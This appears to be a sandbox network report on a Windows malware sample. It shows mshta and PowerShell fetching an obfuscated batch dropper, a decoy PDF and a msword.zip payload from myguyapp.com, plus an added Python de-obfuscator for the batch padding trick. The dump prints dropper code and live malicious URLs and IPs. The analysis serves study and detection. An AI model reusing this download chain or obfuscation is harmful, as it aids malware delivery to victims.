                                                                          Dec 12, 2024 19:07:24.182570934 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.182615995 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.186923027 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.186939955 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.187005043 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.187012911 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.188029051 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.192296982 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.193128109 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.193142891 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.193217039 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.193217039 CET49713443192.168.2.8193.26.115.21
Timestamp                          | Source Port | Dest Port | Source IP   | Dest IP
Dec 12, 2024 19:07:08.322539091 CET | 62925       | 53        | 192.168.2.8 | 1.1.1.1
Dec 12, 2024 19:07:08.650924921 CET | 53          | 62925     | 1.1.1.1     | 192.168.2.8
Dec 12, 2024 19:07:25.106141090 CET | 55510       | 53        | 192.168.2.8 | 1.1.1.1
Dec 12, 2024 19:08:01.974349022 CET | 51611       | 53        | 192.168.2.8 | 1.1.1.1
Dec 12, 2024 19:08:02.197819948 CET | 53          | 51611     | 1.1.1.1     | 192.168.2.8
Dec 12, 2024 19:10:21.122385025 CET | 56646       | 53        | 192.168.2.8 | 1.1.1.1
Dec 12, 2024 19:10:21.442075014 CET | 53          | 56646     | 1.1.1.1     | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 12, 2024 19:07:08.322539091 CET | 192.168.2.8 | 1.1.1.1 | 0x8c4a | Standard query (0) | myguyapp.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 19:07:25.106141090 CET | 192.168.2.8 | 1.1.1.1 | 0xd6f6 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 12, 2024 19:08:01.974349022 CET | 192.168.2.8 | 1.1.1.1 | 0x3bb1 | Standard query (0) | dwLscOsEZmpbOxr.dwLscOsEZmpbOxr | A (IP address) | IN (0x0001) | false
Dec 12, 2024 19:10:21.122385025 CET | 192.168.2.8 | 1.1.1.1 | 0x3c4e | Standard query (0) | me-work.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 12, 2024 19:07:08.650924921 CET | 1.1.1.1 | 192.168.2.8 | 0x8c4a | No error (0) | myguyapp.com | - | 193.26.115.21 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 19:07:25.421901941 CET | 1.1.1.1 | 192.168.2.8 | 0xd6f6 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 19:07:40.619422913 CET | 1.1.1.1 | 192.168.2.8 | 0xb40c | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 19:07:40.619422913 CET | 1.1.1.1 | 192.168.2.8 | 0xb40c | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 19:07:54.237313986 CET | 1.1.1.1 | 192.168.2.8 | 0x19cb | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 19:07:54.237313986 CET | 1.1.1.1 | 192.168.2.8 | 0x19cb | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 19:08:02.197819948 CET | 1.1.1.1 | 192.168.2.8 | 0x3bb1 | Name error (3) | dwLscOsEZmpbOxr.dwLscOsEZmpbOxr | none | none | A (IP address) | IN (0x0001) | false
Dec 12, 2024 19:10:21.442075014 CET | 1.1.1.1 | 192.168.2.8 | 0x3c4e | No error (0) | me-work.com | - | 193.26.115.21 | A (IP address) | IN (0x0001) | false
                                                                          • myguyapp.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49708 | 193.26.115.21 | 443 | 7864 | C:\Windows\SysWOW64\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 18:07:10 UTC | 301 | OUT | GET /c.bat HTTP/1.1
Accept: */*
Accept-Language: en-CH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: myguyapp.com
Connection: Keep-Alive
2024-12-12 18:07:10 UTC | 288 | IN | HTTP/1.1 200 OK
Date: Thu, 12 Dec 2024 18:07:10 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Thu, 12 Dec 2024 13:28:45 GMT
ETag: "d68-62912b1984ca1"
Accept-Ranges: bytes
Content-Length: 3432
Connection: close
Content-Type: application/x-msdownload
2024-12-12 18:07:10 UTC | 3432 | IN | Data Raw: 40 25 47 68 61 45 25 65 25 51 4f 4e 25 63 25 6f 56 4e 6c 78 68 53 25 68 25 59 63 63 25 6f 25 54 5a 53 47 5a 64 54 7a 73 67 25 20 25 6d 43 52 70 25 6f 25 6d 59 73 66 5a 70 58 42 75 50 25 66 25 64 65 6a 54 4d 76 25 66 25 72 4f 59 53 65 66 45 4f 25 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 25 66 59 55 73 62 6e 6f 25 65 25 6d 48 46 71 7a 4c 6c 76 6b 57 25 74 25 68 55 42 76 4b 4f 51 74 57 25 20 25 42 74 61 44 72 73 4a 63 4b 25 75 25 62 77 6a 25 72 25 62 6a 62 25 6c 25 63 70 73 57 54 78 25 3d 25 43 4d 79 66 61 49 25 68 25 4e 4e 44 43 25 74 25 53 5a 47 25 74 25 73 67 25 70 25 77 79 74 64 58 73 48 25 73 25 58 4c 66 59 52 68 4f 25 3a 25 62 77 61 58 4a 53 5a 63 72 25 2f 25 76
Data Ascii: @%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%set url=https://myguyapp.com/msword.zips%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%v
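The `%...%` tokens in the c.bat body above are the usual cmd.exe padding trick: inside a batch file, an environment variable that is not defined expands to the empty string, so `@%GhaE%e%QON%c%oVNlxhS%h...` is simply `@echo off`, and the third statement (the raw bytes show a CRLF after each of the first two) is another `set url=https:/...` cut off at the dump boundary. The session itself is the decrypted TLS exchange (destination port 443, and the script's own URL is https), with the batch file served as `application/x-msdownload`. The de-obfuscator below is an added example, not code from the Joe Sandbox report or from the sample: it applies batch-file expansion rules (undefined names vanish, `%%` becomes `%`, an unpaired `%` is dropped), records plain `set name=value` statements so that later `%name%` references resolve, and runs over the visible fragment of c.bat, transcribed from the Data Ascii line and cut where the report cuts it, as constructed sample input.

```python
import re

# Constructed sample input: the decoded "Data Ascii" fragment of c.bat shown
# in the report, split at the CRLFs (0d 0a) visible in the raw bytes and cut
# where the report's dump is cut. It is not the complete script.
SAMPLE_LINES = [
    "@%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%",
    "set url=https://myguyapp.com/msword.zip",
    "s%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/",
]

# Plain `set name=value`; `set /a` and `set /p` are deliberately not matched.
SET_RE = re.compile(r"^\s*set\s+(?!/)(?P<body>.+)$", re.IGNORECASE)


def expand_line(line: str, env: dict) -> str:
    """Apply cmd.exe batch-file percent expansion to one line.

    Rules implemented (batch-file semantics, not the interactive prompt):
      * %NAME%  -> value of NAME if defined (case-insensitive), else ""
      * %%      -> a literal "%"
      * a "%" with no closing "%" on the line is dropped
    Substring/replace modifiers (%NAME:~1,2%) are not applied; the base
    variable's value is substituted for them.
    """
    out = []
    i, n = 0, len(line)
    while i < n:
        ch = line[i]
        if ch != "%":
            out.append(ch)
            i += 1
            continue
        if i + 1 < n and line[i + 1] == "%":
            out.append("%")
            i += 2
            continue
        j = line.find("%", i + 1)
        if j == -1:                      # unpaired '%' is removed
            i += 1
            continue
        name = line[i + 1:j].split(":", 1)[0].upper()
        value = env.get(name)
        if value is not None:
            out.append(value)
        # undefined variable: expands to nothing, which is the padding trick
        i = j + 1
    return "".join(out)


def record_set(expanded: str, env: dict) -> None:
    """If the expanded line is a plain `set name=value`, remember it."""
    m = SET_RE.match(expanded)
    if not m:
        return
    body = m.group("body").strip()
    if len(body) >= 2 and body[0] == '"' and body[-1] == '"':
        body = body[1:-1]                # set "name=value" form
    if "=" not in body:
        return                           # bare `set name` only displays variables
    name, value = body.split("=", 1)
    env[name.strip().upper()] = value


def deobfuscate(lines, env=None):
    """Expand every line in order, tracking `set` statements as it goes."""
    env = {} if env is None else env
    result = []
    for line in lines:
        expanded = expand_line(line, env)
        record_set(expanded, env)
        result.append(expanded)
    return result


if __name__ == "__main__":
    for cleaned in deobfuscate(SAMPLE_LINES):
        print(cleaned)
```

Running it on the fragment yields `@echo off`, the unobfuscated `set url=https://myguyapp.com/msword.zip`, and `set url=https:/`, the last of which is incomplete only because the report's dump is. Feeding the same function the full 3432-byte body would recover the rest of the script the same way, since the padding variables carry no information at all.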


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49710 | 193.26.115.21 | 443 | 8184 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 18:07:12 UTC | 162 | OUT | GET /f.pdf HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: myguyapp.com
Connection: Keep-Alive
2024-12-12 18:07:13 UTC | 283 | IN | HTTP/1.1 200 OK
Date: Thu, 12 Dec 2024 18:07:13 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 28 Oct 2024 21:28:02 GMT
ETag: "4374e-6259024c862cf"
Accept-Ranges: bytes
Content-Length: 276302
Connection: close
Content-Type: application/pdf
2024-12-12 18:07:13 UTC | 7909 | IN | Data Raw: 25 50 44 46 2d 31 2e 34 0d 0a 25 c2 80 c2 81 c2 82 c2 83 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 20 0d 0a 20 20 20 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 31 20 0d 0a 20 20 20 2f 43 6f 6c 6f 72 53 70 61 63 65 20 33 20 30 20 52 20 0d 0a 20 20 20 2f 48 65 69 67 68 74 20 33 32 38 38 20 0d 0a 20 20 20 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 20 0d 0a 20 20 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 0d 0a 20 20 20 2f 57 69 64 74 68 20 32 35 36 30 20 0d 0a 20 20 20 2f 46 69 6c 74 65 72 20 5b 0d 0a 20 20 20 20 2f 43 43 49 54 54 46 61 78 44 65 63 6f 64 65 20 20 5d 0d 0a 20 20 20 0d 0a 20 20 20 2f 44 65 63 6f 64 65 50 61 72 6d 73 20 5b 0d 0a 20 20 20 20 3c 3c 20 0d 0a 20 20 20 20 20 20 2f 42 6c 61 63 6b 49 73 31 20 74 72 75 65 20 0d 0a 20 20
Data Ascii: %PDF-1.4%1 0 obj<< /BitsPerComponent 1 /ColorSpace 3 0 R /Height 3288 /Subtype /Image /Type /XObject /Width 2560 /Filter [ /CCITTFaxDecode ] /DecodeParms [ << /BlackIs1 true
2024-12-12 18:07:13 UTC | 16384 | IN | Data Raw: fe f7 fc 8c 7f ff ff 55 fd ef fe df fa 8d 69 3f 7e 71 11 d6 be 97 fd 97 0b fb f1 12 2b 58 a7 56 ab ff 17 fd fe af 65 c1 ff ef ff fa 76 37 ff fd bf d6 d2 5f bf ff ff 7f ff f6 fa f7 bf f9 11 c2 fe f9 15 ac b1 4a ff ea 10 fe ff fc 8b cf fb db f8 fe 43 8e 50 ef 0e fb 7d e9 6f e8 47 4e be 43 13 af ff ff ff ef df d3 f7 7f ad d7 ff df 56 d2 fb 4b 7f bb bd ef bb 6d 7e 41 43 58 a6 b5 aa b0 d6 43 47 10 50 a0 30 bf 7c 8b ab bd f8 30 4a ee 2b 7f 5e b5 e3 f6 bf fb ff 6b da df e9 ee fd af 0d 7f af bf 86 bd 84 e1 a6 bd eb 7c 30 9a 06 55 94 39 14 70 88 98 41 11 da 68 44 44 18 21 11 11 1c 44 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c8 09 f0 b8 20 79 01 85 01 0a 9b 25 04 10 79 01 05 d1 7c 8e c8 ec d4 32 5c 50 44 18 04 78 4f 29 95 26 4b 45 3b d1 95 01 b0 a7 20
Data Ascii: Ui?~q+XVev7_JCP}oGNCVKm~ACXCGP0|0J+^k|0U9pAhDD!D y%y|2\PDxO)&KE;
2024-12-12 18:07:13 UTC | 16384 | IN | Data Raw: ff fc 89 22 97 91 f2 0c c8 90 f3 58 c8 36 48 14 8c 1e 4c 05 04 18 41 90 e0 40 cc c3 00 83 33 0c 02 0c d1 a6 10 71 68 3f d3 4d 6d 3f 91 2d a2 3c 7f 5e 46 f2 0b 12 e4 55 99 39 11 83 22 c2 eb 9b 18 22 28 b1 2a 14 38 86 6a 0a 62 34 82 06 7c 30 08 32 1c 13 04 c1 0c 20 c1 10 20 e1 a1 0e d3 4d 3f 09 da 7f 85 44 47 68 8e 1c 84 bc 97 bf a6 e9 fc b7 30 21 06 29 4e 2d 82 98 59 81 41 11 06 cf 00 c1 03 21 a2 3a 04 18 20 60 98 41 94 06 08 c0 c4 43 04 19 30 08 84 34 2d 34 ed 03 43 40 d5 06 a8 3f 4f 4f d1 08 3e 42 43 44 5b 6d 35 c8 b8 e0 9d 27 84 ea 1f e9 d2 6d f0 40 ca 18 20 c2 74 10 87 84 0c 20 d0 86 10 68 44 35 40 c2 0d 3b 86 83 d3 5c 27 ae ab aa de 88 b8 da 91 df e0 83 70 9d 04 e5 06 43 3d 04 e9 3d 3d 37 5f d3 7f 5a 68 5a 17 c5 a0 ed 38 b0 9a 7f ae 9f c8 dd d2 22 db
Data Ascii: "X6HLA@3qh?Mm?-<^FU9""(*8jb4|02 M?DGh0!)N-YA!: `AC04-4C@?OO>BCD[m5'm@ t hD5@;\'pC===7_ZhZ8"
2024-12-12 18:07:13 UTC | 16384 | IN | Data Raw: 23 85 e2 a2 98 e2 9a ff 76 bf ab e9 a6 98 54 d0 88 86 08 89 b2 3e 22 19 46 e6 96 be 2b 90 9d d8 e3 63 f7 a7 6b fd a0 c2 6a 9a 0d 34 19 0b 61 08 83 04 0c 12 86 10 88 8e d7 bf 7e d5 3f 4c 26 98 4d 53 54 d3 08 30 9a 11 06 08 30 84 44 68 71 f6 b7 fa a6 43 be a4 c7 08 34 c2 0c 20 64 7b 17 04 22 23 fe 18 55 b4 d3 04 47 52 e0 20 61 08 e1 84 19 19 72 cd c2 a3 88 64 55 94 22 75 31 c4 71 11 6b 11 1f 6b f1 d7 ff ff f7 61 62 3f ff ff ff ff ff ff ff ff ef fa ff ff ff ff fe ff af fe ff ff ff ff ff ff ff ff ff ff ff ff ff 94 c2 9b cb 6d 69 fd ae 5a a6 a1 0e c5 33 b4 0b d9 5d 5d 96 69 f2 3b 32 10 64 71 9a 65 c1 0e 80 dc 20 66 a0 6e 83 5f 0b 96 61 34 50 66 98 21 22 d6 4a b2 c1 90 cd c2 75 93 a0 86 10 83 b4 1f af 5e 59 4c 22 e8 be 47 22 f9 9b 23 99 1d 17 23 38 a0 18 3a 0a
Data Ascii: #vT>"F+ckj4a~?L&MST00DhqC4 d{"#UGR ardU"u1qkkab?miZ3]]i;2dqe fn_a4Pf!"Ju^YL"G"##8:
2024-12-12 18:07:13 UTC | 16384 | IN | Data Raw: f2 46 68 83 fb ff b9 4e ff da ff 0d 87 77 ff 44 63 be bd b4 0c 20 79 a3 77 b5 db 5b 4e ff bf f7 39 3f ff d7 7f ff a7 f1 f1 5e eb b7 ff 9c 2d 07 fa 5f a4 de bf 6b 7f ab 5b b6 17 af ff fe fe fa 5c 8f 9b 46 12 57 6b ee 96 ba ff 56 b6 bd 75 fd ff b6 bb c4 44 97 5b b4 be 18 56 2b fd 76 1a 4d af ff f8 5b 5e c2 5f ef 15 ec 57 fd 6f 1d a5 a6 b7 fb 0c 24 c5 6c 76 ba 4c 3f da 6b f7 e9 a6 3b df fe 3f 6b f4 ba f6 9a 77 f6 dd aa ff fd a6 b6 15 35 4d 06 a4 dc 21 10 61 03 04 3f 5b 4d 06 16 ff 5b 4d 06 84 30 85 a1 11 c4 47 76 ab 0c 10 61 06 10 88 88 88 32 2a 72 39 01 d4 44 68 96 8a 0c e3 82 11 1f c4 47 d7 d2 df f5 d6 98 5e 3d 63 bf ff ff ff ff f9 67 7f ac 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd d5 cb 30 28 ce 88 ba 21 b3 a6 50 b2 ce 2f 90 f2
Data Ascii: FhNwDc yw[N9?^-_k[\FWkVuD[V+vM[^_Wo$lvL?k;?kw5M!a?[M[M0Gva2*r9DhG^=cg0(!P/
2024-12-12 18:07:13 UTC | 16384 | IN | Data Raw: ea 08 c0 a1 7c 8e 9c 56 d5 44 e8 9b d4 33 ba 08 c3 da 87 84 08 7e 11 c4 53 e1 9e 29 91 d6 bc 1e 1a 4f 48 c2 13 a2 86 b2 e3 40 89 58 77 16 92 97 c4 bf 0d 3f c1 1c 7e 47 5d 5e 14 c6 22 61 58 71 42 a8 22 28 e0 fa 4e c2 9b 49 0d b8 c7 61 38 7a a8 6b 30 a1 37 88 20 46 05 8f ae 28 12 d4 47 14 c4 17 08 3d 68 25 a4 21 bc 36 60 6f f7 a0 81 05 98 48 10 b6 5d 62 08 f6 3d 30 aa 12 08 2d 04 1f a0 8a 70 8b ea d1 1d 78 45 0e bf 31 d0 73 3f 08 a1 d7 91 d6 81 11 fd f3 08 63 61 1c 5d 68 21 f1 f7 68 c6 33 c4 4c 75 49 42 07 c4 3b f9 84 2d 50 98 ea 92 84 38 bb fc 28 3a 7f 8d 16 39 87 ce ea d8 df 15 61 a7 6b 58 41 ed 62 85 21 88 4a ac c0 47 57 18 28 df 16 a1 55 c1 11 ee a6 7a 5b 48 a1 dd c4 d3 1b 40 8a f0 e3 d2 08 2e 9d dd d3 48 60 88 f8 6c 11 44 45 3f ee 18 60 c6 a5 44 5a ef
Data Ascii: |VD3~S)OH@Xw?~G]^"aXqB"(NIa8zk07 F(G=h%!6`oH]b=0-pxE1s?ca]h!h3LuIB;-P8(:9akXAb!JGW(Uz[H@.H`lDE?`DZ
2024-12-12 18:07:13 UTC | 16384 | IN | Data Raw: ad 18 4b 1a 97 ef 54 81 15 08 45 dc fc a5 f3 f9 7c bd 58 8b b9 9f 64 78 f6 5f 30 ab 11 dc cd 18 cc 22 46 5d 35 42 3b 44 34 6a 4d 0a ed 6c 22 46 51 97 eb 73 aa c5 a7 1f ac 68 a3 3a e1 c4 53 b5 b8 84 1d c9 f2 13 d0 4c 64 f9 74 6b 56 35 88 88 88 b1 89 f4 5f 35 f5 88 88 88 be 26 32 0d 0a e3 42 2d 0e e2 44 d1 8e 61 d3 5c d0 58 e6 1f 2d c2 30 84 41 15 07 7c c3 98 70 53 0f 8a 16 b5 43 40 88 e1 4e 71 5f 10 96 61 e9 31 ab 14 a2 3d a0 44 7f 49 53 bb 51 b5 11 0a 35 fd c3 65 4e 47 6c a1 ca 71 8a 69 59 1f 36 81 12 1f 1d 29 74 81 17 59 81 92 22 3f 70 40 8e 3d d8 e3 23 e2 66 8c 69 90 f3 ea ae f2 3d f9 1d 20 45 d2 66 11 7d 06 92 c2 23 e0 8e 39 87 c4 44 64 7e ec 4c 44 3c 4b ac 11 c7 a1 64 7d 6f cf e2 63 3a 21 2f dd c6 47 93 b4 d4 fe 26 10 97 5d e9 9e d5 35 11 2e b3 3d 32
Data Ascii: KTE|Xdx_0"F]5B;D4jMl"FQsh:SLdtkV5_5&2B-Da\X-0A|pSC@Nq_a1=DISQ5eNGlqiY6)tY"?p@=#fi= Ef}#9Dd~LD<Kd}oc:!/G&]5.=2
2024-12-12 18:07:13 UTC | 16384 | IN | Data Raw: 49 82 fd d7 b0 6b 54 ec 35 0e f3 0f 4c bb 60 a1 08 87 ff c3 83 c3 41 b5 62 e2 14 44 f6 f6 20 8a bb 84 71 e5 91 50 33 76 bf 07 f5 f8 3d ce e0 31 8b 62 13 15 34 44 76 a9 82 67 11 84 10 4e da f8 41 60 cc 38 ba c2 67 30 47 1f 61 cb ea b0 44 7d 8a 72 c8 14 1a 4d 8f e1 f6 fd 58 3b a2 64 19 99 27 36 74 e8 24 20 f9 1e 85 40 b8 2d ff 88 82 04 0a 1c 48 fb 74 47 e2 c8 f1 cc df 97 63 15 a0 84 5c b2 16 06 b7 f8 7f 4b e1 f8 22 1a 6c 81 24 3b 6c da 4c 30 92 2e b1 b1 75 08 21 9d d9 84 be 96 6f 43 34 93 23 cd 04 56 43 8d a0 ed b4 58 f1 09 98 ac b2 0b 02 a6 4a 1f ef b7 f4 c1 db 40 88 6d 32 0c e2 c3 15 14 82 0c be 2e 35 e1 b1 06 df 7c 42 2d d4 32 3f 41 02 23 a0 98 b9 cd 30 e1 bb 23 a6 9b 34 56 1b 23 c1 02 cb 20 90 32 bf fb 7e 97 b0 7e 08 3c ba 12 f5 c1 25 4a 7d 67 f0 81 0b
Data Ascii: IkT5L`AbD qP3v=1b4DvgNA`8g0GaD}rMX;d'6t$ @-HtGc\K"l$;lL0.u!oC4#VCXJ@m2.5|B-2?A#0#4V# 2~~<%J}g
2024-12-12 18:07:13 UTC | 16384 | IN | Data Raw: b1 65 3b 4c 22 a8 7e 82 4d 84 b6 55 b1 15 41 11 f5 ad 2b 45 db 62 3f fe 35 44 1b 47 f2 c7 ff ff d7 ef 75 69 76 c4 42 36 bb 47 d4 e2 8f 6d b5 a4 20 c5 bc 48 e8 20 56 91 71 22 c2 1a 08 8f 98 df b8 52 6c c2 4d 7e 6a 83 1f bb fe dd 57 5f af fe b6 61 18 52 87 17 fa 4c a1 ca 78 30 84 45 bc fa 35 60 98 ff c9 0e 11 1d 36 6e 50 87 09 94 e0 8c 20 60 88 fa 2a 02 23 8a 08 13 68 11 1d 38 61 c2 23 ab 5f 6f 91 5c ce a2 e8 1a d9 27 20 90 4d d5 89 83 85 fa aa fa b0 d0 9c 71 10 69 af 4b 8b 89 f4 46 40 8a 78 dc 34 11 a6 db bd 53 e3 4c 5e 21 82 c2 87 16 08 12 4c 57 04 0b 68 11 43 82 0b b1 55 fb 63 b1 15 50 85 8d 3f 5a 5d 69 7e 1c 54 83 71 fd 28 5c 44 f3 48 be b6 47 44 74 48 d5 a6 50 7e f5 47 74 22 50 85 13 1e a5 d0 de 9a 29 d3 08 8f bf 0c 63 1e bf 4b 7f 08 84 82 f8 83 8f b4
Data Ascii: e;L"~MUA+Eb?5DGuivB6Gm H Vq"RlM~jW_aRLx0E5`6nP `*#h8a#_o\' MqiKF@x4SL^!LWhCUcP?Z]i~Tq(\DHGDtHP~Gt"P)cK
2024-12-12 18:07:13 UTC | 16384 | IN | Data Raw: a2 3c e6 31 d4 47 1f b8 43 88 9c 88 e8 61 28 4e b1 04 12 77 f0 43 42 d1 1f 2f 18 c9 09 36 ed b1 23 a4 11 84 69 0f 06 60 52 3c 5f b3 e8 20 42 67 62 4e a9 6a a0 d0 60 ef f9 f4 26 d2 16 ea 7b 1d de 82 c2 55 36 2f a5 17 46 d0 d9 c4 9b ae c2 53 0f 0c 11 d3 bf a5 31 89 3f 6e 3b b6 2d 0c 8b 77 61 17 04 23 ae 82 2d d0 30 40 99 1d 62 a8 a1 e2 90 eb 8a 97 49 36 de af f0 fc 5f 3f 07 51 39 8a 25 62 f8 a1 41 06 2e c4 44 c4 0a 48 7b 09 23 12 d8 dd ee e8 23 49 8b 10 65 20 af 28 76 25 fc 8f 03 1f 08 32 a0 32 3a 96 e9 5b a3 e8 9e a0 8e 82 de 5e 11 5b a6 ce 27 f5 4c 4c 2b 73 71 8b 3c fd a3 da d9 1d be 82 65 00 90 f1 10 46 81 82 05 f6 a1 04 08 32 3a 05 4e 92 16 c4 ba 38 ae fc 52 23 ab 34 b4 82 46 12 2b 2a 37 6d 37 2a 22 14 61 38 6d 21 c3 d4 21 17 2e d8 49 1c d0 42 14 3b ee
Data Ascii: <1GCa(NwCB/6#i`R<_ BgbNj`&{U6/FS1?n;-wa#-0@bI6_?Q9%bA.DH{##Ie (v%22:[^['LL+sq<eF2:N8R#4F+*7m7*"a8m!!.IB;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49713 | 193.26.115.21 | 443 | 964 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 18:07:18 UTC | 167 | OUT | GET /msword.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: myguyapp.com
Connection: Keep-Alive
2024-12-12 18:07:18 UTC | 285 | IN | HTTP/1.1 200 OK
Date: Thu, 12 Dec 2024 18:07:18 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 29 Oct 2024 16:49:11 GMT
ETag: "3a0583-625a05d5cdaa6"
Accept-Ranges: bytes
Content-Length: 3802499
Connection: close
Content-Type: application/zip
2024-12-12 18:07:18 UTC | 7907 | IN | Data Raw: 50 4b 03 04 14 00 00 00 08 00 05 ab 5c 59 89 46 99 25 0d 05 3a 00 f7 ff 1f 35 0a 00 00 00 6d 73 77 6f 72 64 2e 65 78 65 ec bd 7f 7c 54 c5 b9 3f 7e f6 47 c2 92 6c d8 45 12 0c 1a 34 42 50 94 1f 8d 2e 28 71 41 17 c8 09 d1 b2 b8 b8 66 17 94 00 2a c4 c3 8a 40 c9 39 fc 68 89 26 9c a4 b2 1e d6 5a 6b 6f b5 b5 b7 a6 d8 5b db da 4a 5b 2b 51 11 13 40 12 94 5a 14 2e a6 05 af 11 a9 ce ba 51 57 89 61 81 c8 f9 bc 9f 99 dd 10 b8 b6 bd 9f cf eb 7e ff fb 06 67 cf 9c 39 cf cc 3c f3 cc f3 73 66 ce d1 7f fb 23 92 4d 92 24 3b 92 69 4a 52 8b 24 fe 7c d2 bf fe db 8f 34 e4 d2 97 86 48 cf 0f fe f3 65 2d 96 d9 7f be ec 36 65 59 6d f1 aa d5 2b ef 59 7d e7 7d c5 77 df b9 62 c5 4a b5 f8 ae a5 c5 ab b5 15 c5 cb 56 14 97 df 12 2c be 6f e5 92 a5 13 f3 f2 72 4a d2 6d 4c ff ce 5b f7 66 5d
Data Ascii: PK\YF%:5msword.exe|T?~GlE4BP.(qAf*@9h&Zko[J[+Q@Z.QWa~g9<sf#M$;iJR$|4He-6eYm+Y}}wbJV,orJmL[f]
2024-12-12 18:07:19 UTC | 16384 | IN | Data Raw: 56 85 d9 33 a3 08 bd c4 85 18 67 11 1f e7 f7 bf ca 60 3f 48 ff d4 ea 3d 51 fb 77 9a 66 52 54 de 13 ab 57 f0 78 9b 1c 75 f6 d1 78 be 62 7e 75 1a e1 bb c7 d0 e6 33 3f 2e 32 0f 59 b0 84 5b cf 7b 96 d4 20 bb f7 12 f2 2d d0 77 11 bb 18 c3 62 9b d0 83 59 b0 1b b3 54 06 28 57 e3 27 84 2d 6d fe 71 3c 7f 7f 19 c5 1b 66 c1 d3 34 36 07 1f db 68 34 28 f4 63 30 b3 2b ab be 58 15 14 72 12 14 c7 52 6a ca 26 10 1e 5a 6e 1a 9f 03 25 12 b5 57 24 4e 06 bc 56 42 67 31 88 c3 1c ab 70 fb 02 6e 23 17 2d da c1 a0 7f f8 19 43 73 6b 31 29 61 f6 c4 78 71 ee a3 41 e0 a6 de 18 b1 84 14 52 ec 66 c1 53 f5 bc df 09 55 21 76 a8 54 ca 54 2b e1 d5 ee a2 6a ec df 30 51 de d7 d4 dc b4 24 11 09 6a cc 2c ea f0 16 ed 89 aa 20 fb 19 aa c5 cf 80 39 ca 26 d0 2a a6 fa 9d 88 8d 5d 0a ce 8e d8 8d 4e
Data Ascii: V3g`?H=QwfRTWxuxb~u3?.2Y[{ -wbYT(W'-mq<f46h4(c0+XrRj&Zn%W$NVBg1pn#-Csk1)axqARfSU!vTT+j0Q$j, 9&*]N
